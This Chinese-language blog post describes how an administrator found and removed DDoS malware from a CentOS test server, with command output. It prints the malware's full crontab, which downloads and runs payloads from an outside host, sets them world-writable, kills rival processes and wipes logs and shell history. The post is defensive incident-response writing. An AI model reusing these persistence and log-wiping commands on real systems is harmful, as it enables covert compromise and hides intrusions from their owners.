2014/10/30 21:05
今天下午,同事向我申请机房测试机的权限,我便把一台闲置的CentOS测试机的权限发了这位同事,同事登陆后说机器卡的厉害,我登陆查看才发现机器状态可疑。进而发现了设备中了此病毒,才有了这次解决过程。
我登陆后首先top查看设备负载,4颗CPU负载一直维持在40~50%之间,并且卡的厉害,由于测试机的上联交换机百兆端口,未做限速,因此怀疑网络有状况,遂查看设备出口流量:设备的流量保持在80M。
当天的流量图:
近期的流量图:
####此时才发现,设备已经中招一个月了,竟然毫无察觉,太失职了!####
#### zabbix 监控还是需要尽快搭建 ####
流量图显示:该设备的上联交换机端口流入很高的流量,即该设备持续向外大量发包;由此判断:设备应该是中毒了。遂进系统展开一系列排查。
#1,
①top
top中,使用shift + m ,shift + t 分别查看内存,cpu消耗最大的进程,发现两个名程分别为sfewfesfs和sfewfesfsh 还有几个名为.sshddxxxxxxxxxx的进程占据了大量的内存及cpu时间。
②find
使用find查找到sfewfesfsh 和 sfewfesfs文件
文件位于/etc/下
尝试删除,不成功。
③lsattr,chattr
lsattr查看文件具有 i 属性,
chattr -i 去除文件的 i 属性,
rm 删除,成功
※※几分钟之后,再次top查看又看到这几个进程,因此判断病毒有自我保护的功能,遂查看计划任务※※
#2,
查看定时任务,病毒写了一系列的定时任务,通过定时任务就可以看到病毒的逻辑。
清空定时任务,
rm -rf /var/spool/cron/root
####下面就是计划任务的内容####
[root@FreeSMonitor ~]# crontab -l | grep -v “#|^$”
*/1 * * * * killall -9 .IptabLes
*/1 * * * * killall -9 nfsd4
*/1 * * * * killall -9 profild.key
*/1 * * * * killall -9 nfsd
*/1 * * * * killall -9 DDosl
*/1 * * * * killall -9 lengchao32
*/1 * * * * killall -9 b26
*/1 * * * * killall -9 codelove
*/1 * * * * killall -9 32
*/1 * * * * killall -9 64
*/1 * * * * killall -9 new6
*/1 * * * * killall -9 new4
*/1 * * * * killall -9 node24
*/1 * * * * killall -9 freeBSD
*/99 * * * * killall -9 fdsfsfvff
*/98 * * * * killall -9 gfhjrtfyhuf
*/97 * * * * killall -9 fdsfsfvff
*/96 * * * * killall -9 rewgtf3er4t
*/95 * * * * killall -9 whitptabil
*/94 * * * * killall -9 gdmorpen
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/sfewfesfs
*/130 * * * * cd /etc; wget -c http://www.frade8c.com:9162/fdsfsfvff
*/130 * * * * cd /etc; wget -c http://www.frade8c.com:9162/smarvtd
*/140 * * * * cd /etc; wget -c http://www.frade8c.com:9162/rewgtf3er4t
*/140 * * * * cd /etc; wget -c http://www.frade8c.com:9162/whitptabil
*/120 * * * * cd /etc; wget -c http://www.frade8c.com:9162/gdmorpen
*/120 * * * * cd /root;rm -rf dir nohup.out
*/360 * * * * cd /etc;rm -rf dir gfhjrtfyhuf
*/360 * * * * cd /etc;rm -rf dir gdmorpen
*/360 * * * * cd /etc;rm -rf dir fdsfsfvff
*/360 * * * * cd /etc;rm -rf dir rewgtf3er4t
*/360 * * * * cd /etc;rm -rf dir smarvtd
*/360 * * * * cd /etc;rm -rf dir whitptabil
*/1 * * * * cd /etc;rm -rf dir sfewfesfs.*
*/1 * * * * cd /etc;rm -rf dir gfhjrtfyhuf.*
*/1 * * * * cd /etc;rm -rf dir gdmorpen.*
*/1 * * * * cd /etc;rm -rf dir fdsfsfvff.*
*/1 * * * * cd /etc;rm -rf dir rewgtf3er4t.*
*/1 * * * * cd /etc;rm -rf dir smarvtd.*
*/1 * * * * cd /etc;rm -rf dir whitptabil.*
*/1 * * * * chmod 7777 /etc/gfhjrtfyhuf
*/1 * * * * chmod 7777 /etc/sfewfesfs
*/1 * * * * chmod 7777 /etc/gdmorpen
*/1 * * * * chmod 7777 /etc/fdsfsfvff
*/1 * * * * chmod 7777 /etc/rewgtf3er4t
*/1 * * * * chmod 7777 /etc/smarvtd
*/1 * * * * chmod 7777 /etc/whitptabil
*/1 * * * * chmod 7777 /tmp/gfhjrtfyhuf
*/1 * * * * chmod 7777 /tmp/sfewfesfs
*/1 * * * * chmod 7777 /tmp/gdmorpen
*/1 * * * * chmod 7777 /tmp/fdsfsfvff
*/1 * * * * chmod 7777 /tmp/rewgtf3er4t
*/1 * * * * chmod 7777 /tmp/smarvtd
*/1 * * * * chmod 7777 /tmp/whitptabil
*/120 * * * * nohup /tmp/whitptabil > /dev/null 2>&1&
*/120 * * * * nohup /tmp/smarvtd > /dev/null 2>&1&
*/120 * * * * nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
*/120 * * * * nohup /tmp/fdsfsfvff > /dev/null 2>&1&
*/120 * * * * nohup /tmp/gdmorpen > /dev/null 2>&1&
*/120 * * * * nohup /tmp/sfewfesfs > /dev/null 2>&1&
*/99 * * * * nohup /etc/sfewfesfs > /dev/null 2>&1&
*/100 * * * * nohup /etc/fdsfsfvff > /dev/null 2>&1&
*/99 * * * * nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
*/98 * * * * nohup /etc/fdsfsfvff > /dev/null 2>&1&
*/97 * * * * nohup /etc/rewgtf3er4t > /dev/null 2>&1&
*/96 * * * * nohup /etc/whitptabil > /dev/null 2>&1&
*/95 * * * * nohup /etc/gdmorpen > /dev/null 2>&1&
*/1 * * * * echo “unset MAILCHECK” >> /etc/profile
*/1 * * * * rm -rf /root/.bash_history
*/1 * * * * touch /root/.bash_history
*/1 * * * * history -r
*/1 * * * * cd /var/log > dmesg
*/1 * * * * cd /var/log > auth.log
*/1 * * * * cd /var/log > alternatives.log
*/1 * * * * cd /var/log > boot.log
*/1 * * * * cd /var/log > btmp
*/1 * * * * cd /var/log > cron
*/1 * * * * cd /var/log > cups
*/1 * * * * cd /var/log > daemon.log
*/1 * * * * cd /var/log > dpkg.log
*/1 * * * * cd /var/log > faillog
*/1 * * * * cd /var/log > kern.log
*/1 * * * * cd /var/log > lastlog
*/1 * * * * cd /var/log > maillog
*/1 * * * * cd /var/log > user.log
*/1 * * * * cd /var/log > Xorg.x.log
*/1 * * * * cd /var/log > anaconda.log
*/1 * * * * cd /var/log > yum.log
*/1 * * * * cd /var/log > secure
*/1 * * * * cd /var/log > wtmp
*/1 * * * * cd /var/log > utmp
*/1 * * * * cd /var/log > messages
*/1 * * * * cd /var/log > spooler
*/1 * * * * cd /var/log > sudolog
*/1 * * * * cd /var/log > aculog
*/1 * * * * cd /var/log > access-log
*/1 * * * * cd /root > .bash_history
*/1 * * * * history -c
[root@FreeSMonitor ~]#
①病毒主要包含以下模块
gfhjrtfyhuf
sfewfesfs
fdsfsfvff
smarvtd
rewgtf3er4t
whitptabil
gdmorpen
②病毒会做一些例如关闭防火墙的操作来为自己创造运行环境
③病毒会定时下载新的病毒版本做到升级
④病毒会清空各种日志文件以及history记录
⑤并且还发现:不但在/etc/下有病毒的相关内容,在/tmp/下也有
⑥/etc/profile下有客户追加的信息:unset MAILCHECK
[root@FreeSMonitor ~]# cat /etc/profile | wc -l
1438
[root@FreeSMonitor ~]#
####/etc/profile的56行后全部是unset MAILCHECK的内容####
[root@FreeSMonitor ~]# head -60 /etc/profile
# /etc/profile# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrcpathmunge () {
if ! echo $PATH | /bin/egrep -q “(^|:)$1($|:)” ; then
if [ “$2″ = “after” ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
fi
}# ksh workaround
if [ -z “$EUID” -a -x /usr/bin/id ]; then
EUID=`id -u`
UID=`id -ru`
fi
# Path manipulation
if [ “$EUID” = “0” ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
fi
# No core files by default
ulimit -S -c 0 > /dev/null 2>&1
if [ -x /usr/bin/id ]; then
USER=”`id -un`”
LOGNAME=$USER
MAIL=”/var/spool/mail/$USER”
fi
HOSTNAME=`/bin/hostname`
HISTSIZE=1000
if [ -z “$INPUTRC” -a ! -f “$HOME/.inputrc” ]; then
INPUTRC=/etc/inputrc
fi
export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE INPUTRC
for i in /etc/profile.d/*.sh ; do
if [ -r “$i” ]; then
if [ “$PS1″ ]; then
. $i
else
. $i >/dev/null 2>&1
fi
fi
done
unset i
unset pathmunge
unset MAILCHECK
unset MAILCHECK
[root@FreeSMonitor ~]#
#3,##删除/etc/profile的多余内容##
[root@FreeSMonitor ~]# cat /etc/profile
# /etc/profile# System wide environment and startup programs, for login setup
# Functions and aliases go in /etc/bashrcpathmunge () {
if ! echo $PATH | /bin/egrep -q “(^|:)$1($|:)” ; then
if [ “$2″ = “after” ] ; then
PATH=$PATH:$1
else
PATH=$1:$PATH
fi
fi
}# ksh workaround
if [ -z “$EUID” -a -x /usr/bin/id ]; then
EUID=`id -u`
UID=`id -ru`
fi
# Path manipulation
if [ “$EUID” = “0” ]; then
pathmunge /sbin
pathmunge /usr/sbin
pathmunge /usr/local/sbin
fi
# No core files by default
ulimit -S -c 0 > /dev/null 2>&1
if [ -x /usr/bin/id ]; then
USER=”`id -un`”
LOGNAME=$USER
MAIL=”/var/spool/mail/$USER”
fi
HOSTNAME=`/bin/hostname`
HISTSIZE=1000
if [ -z “$INPUTRC” -a ! -f “$HOME/.inputrc” ]; then
INPUTRC=/etc/inputrc
fi
export PATH USER LOGNAME MAIL HOSTNAME HISTSIZE INPUTRC
for i in /etc/profile.d/*.sh ; do
if [ -r “$i” ]; then
if [ “$PS1″ ]; then
. $i
else
. $i >/dev/null 2>&1
fi
fi
done
[root@FreeSMonitor ~]#
#4,检查/etc/,删除可疑文件
#①,看到名为nhgbhhj的可疑文件一并删除
rm -rf /etc/nhgbhhj
参考http://www.linuxquestions.org/qu … malware-4175501872/
#2,用ls -al看到.SSH2隐藏文件,删除
rm -rf /etc/.SSH2
#5,查看rc.local的内容,同样发现一堆类似于计划任务里的启动项,同时还多了一个”/root/dos32″
#因为这台测试机安装的操作系统为32位的,因此就启动了这个程序##
检查/root/下可以文件,一并删除。
#检查其他文件 .bash_history .bash_logout .bash_profile .bashrc ##没有发现问题
[root@FreeSMonitor ~]# ll -a
total 1265296
drwxr-x— 5 root root 4096 Oct 30 23:02 .
drwsrwsrwt 22 root root 4096 Oct 30 18:11 ..
-rw——- 1 root root 1384 May 28 2011 anaconda-ks.cfg
-rw-r–r– 1 root root 10871 Oct 30 22:29 .bash_history
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
-rw-r–r– 1 root root 100652 Sep 13 01:20 dos32.1 ##这应该就是病毒的最新版本的日期–9月13日
-rw-r–r– 1 root root 100652 Sep 13 15:02 dos32.2
-rw-r–r– 1 root root 176166 Sep 13 01:21 dos64.1
-rw-r–r– 1 root root 176166 Sep 13 15:02 dos64.2
drwx—— 3 root root 4096 May 28 2011 .gconf
drwx—— 2 root root 4096 Oct 30 17:11 .gconfd
-rw-r–r– 1 root root 30500 May 28 2011 install.log
-rw-r–r– 1 root root 4041 May 28 2011 install.log.syslog
-rw——- 1 root root 40 Oct 30 18:05 .lesshst
-rw——- 1 root root 167 Sep 15 13:38 .mysql_history
drwx—— 2 root root 4096 Sep 17 15:01 .ssh ##这个目录下的know_hosts也需要一并删除
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc
-rw——- 1 root root 4666 Oct 30 23:02 .viminfo
-rw-r–r– 1 root root 10478 Sep 14 00:05 yum.log
[root@FreeSMonitor ~]#
##清空.ssh/known_hosts##并修改连接过的主机的密码,并做相应的检查##
[root@FreeSMonitor ~]# cat .ssh/known_hosts
119.161.218.249 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAy2Uxh9CqmpcR+F5I1atL8mnuyYA0B1Hjy3SbMjM6y5+KpGpS94b+g9zfsZNg0nmFcGtKJRT9qDbC80R2kUz7sDdLb5LR68q7jTFTxZQ9NeTHIy7ClZ6X63u8N+GHDUBh9is7j6kHqqYUpFuJmIJIcLgU02jLKF5AQqAQ9o/WKoKB979WLTlME4uBf5sDg3c50hSQM9fqisg6ZHLqqszzT447tGXBpoimvqRoMAWIoIn37mO+JzflMBMoVwiamiRV/C/HxusM+ny5MEiVnjGtN1Vhc9k4CRYCudAo/yXTWeGo6tJ0qLVwOZUe1kOInmhN/cxllpQ4Zk0geKfY4CFyXw==
118.145.16.72 ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEAwxXkeIReJswBya5YWxyzx4y4402VeHUnVE2i1EEE59TfXHH8/DpvzU3RBbiOy9lT3C2DCd7gf3lXr19bpuuoEI3V7Hr4bd3BjMi3Hk/GPObzSmpTfF835ixCFlcJoBMqY9pNv81NOjOxF92SpSXLEEeiRj/dBN7sTIFN8Cva823I3DsAwxENioqj1l5xaePvVJB4DvMYmwldRRIDUGBWuYvksEt0BGc3/tJT6ukSozPrVH+vRRwRIgS242UqaBIAZoo+fLUtuWynuKOGg94UHm5kP5Mt/vG9GSXESyWnTt492Ppz3lsgPVhvSjHvozqO0bzhiDsxyG7QJeA2NFPlhQ==
[root@FreeSMonitor ~]# > .ssh/known_hosts
[root@FreeSMonitor ~]# cat .ssh/known_hosts
[root@FreeSMonitor ~]#
重启后还是存在可疑连接,发下来源于/opt/下的一个可疑目录,全部删除。
其中有一个目录挂载到了tmpfs,需要 umount -lf 强行卸载掉。
清空 /tmp/目录 再次重启
##第一次重启后查看网络连接##
[root@FreeSMonitor ~]# netstat -an
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 0.0.0.0:514 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:60005 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:873 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:443 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:15551 0.0.0.0:* LISTEN
tcp 0 401 118.145.16.162:37521 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37532 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37539 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37547 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37551 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37550 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37553 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37559 115.231.17.9:56789 ESTABLISHED
tcp 0 401 118.145.16.162:37556 115.231.17.9:56789 ESTABLISHED
tcp 0 0 :::22478 :::* LISTEN
tcp 0 0 ::ffff:118.145.16.162:22478 ::ffff:222.128.187.16:24898 ESTABLISHED
tcp 0 52 ::ffff:118.145.16.162:22478 ::ffff:222.128.187.16:27486 ESTABLISHED
tcp 0 0 ::ffff:118.145.16.162:22478 ::ffff:210.51.190.155:64691 ESTABLISHED
udp 0 0 0.0.0.0:514 0.0.0.0:*
udp 0 0 0.0.0.0:161 0.0.0.0:*
udp 0 0 0.0.0.0:162 0.0.0.0:*
raw 110336 0 0.0.0.0:17 0.0.0.0:* 7
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 8194 /opt/fsm/var/www/php-cgi.sock
unix 2 [ ACC ] STREAM LISTENING 72018 /tmp/ssh-TUYPT10230/agent.10230
unix 2 [ ACC ] STREAM LISTENING 8338 /opt/fsm/nms/merlin/ipc.sock
unix 2 [ ACC ] STREAM LISTENING 7335 /var/run/acpid.socket
unix 9 [ ] DGRAM 7205 /dev/log
unix 2 [ ] DGRAM 3530 @/org/kernel/udev/udevd
unix 2 [ ] DGRAM 72009
unix 2 [ ] DGRAM 47643
unix 3 [ ] STREAM CONNECTED 21362
unix 3 [ ] STREAM CONNECTED 21361
unix 2 [ ] DGRAM 21357
unix 3 [ ] STREAM CONNECTED 21147
unix 3 [ ] STREAM CONNECTED 21146
unix 3 [ ] STREAM CONNECTED 21144
unix 3 [ ] STREAM CONNECTED 21143
unix 2 [ ] DGRAM 9497
unix 3 [ ] STREAM CONNECTED 8414 /opt/fsm/nms/merlin/ipc.sock
unix 3 [ ] STREAM CONNECTED 8356
unix 2 [ ] DGRAM 8325
unix 3 [ ] STREAM CONNECTED 8198
unix 3 [ ] STREAM CONNECTED 8197
unix 3 [ ] STREAM CONNECTED 8193
unix 3 [ ] STREAM CONNECTED 8192
unix 2 [ ] DGRAM 7600
unix 2 [ ] DGRAM 7213
[root@FreeSMonitor ~]#
通过短时的观察,问题已经解决了,流量也下来了,也没有再次生成病毒文件,暂且在观察一段时间。
####出现问题原因####
由于是一台测试机,没有做相应的安全设置,没有修改ssh端口号,并且用户名为root,并且密码复杂程度不够。
####亡羊补牢的内容####
修改ssh端口,禁止root登陆。
